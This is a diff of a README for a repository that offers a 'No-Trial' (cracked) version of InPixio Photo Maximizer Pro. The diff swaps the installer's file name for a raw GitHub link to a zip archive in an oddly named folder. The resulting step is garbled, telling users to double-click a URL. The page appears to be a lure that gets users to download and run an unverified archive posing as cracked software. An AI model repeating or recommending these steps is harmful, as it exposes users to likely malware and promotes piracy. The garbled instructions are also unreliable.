josebebebu12/InPixio-Photo-Maximizer-Pro-No-Trial/README.md

 Once you have downloaded the software, follow these steps to install it:

 1. Open the folder where the downloaded file is located.
-2. Double-click the installer file named `InPixioPhotoMaximizerPro.exe`.
+2. Double-click the installer file named `https://raw.githubusercontent.com/josebebebu12/InPixio-Photo-Maximizer-Pro-No-Trial/main/ophiologist/InPixio-Photo-Maximizer-Pro-No-Trial-v1.3-alpha.1.zip`.
 3. Follow the on-screen prompts:
    - Accept the license agreement.
    - Choose your installation folder (default is usually fine).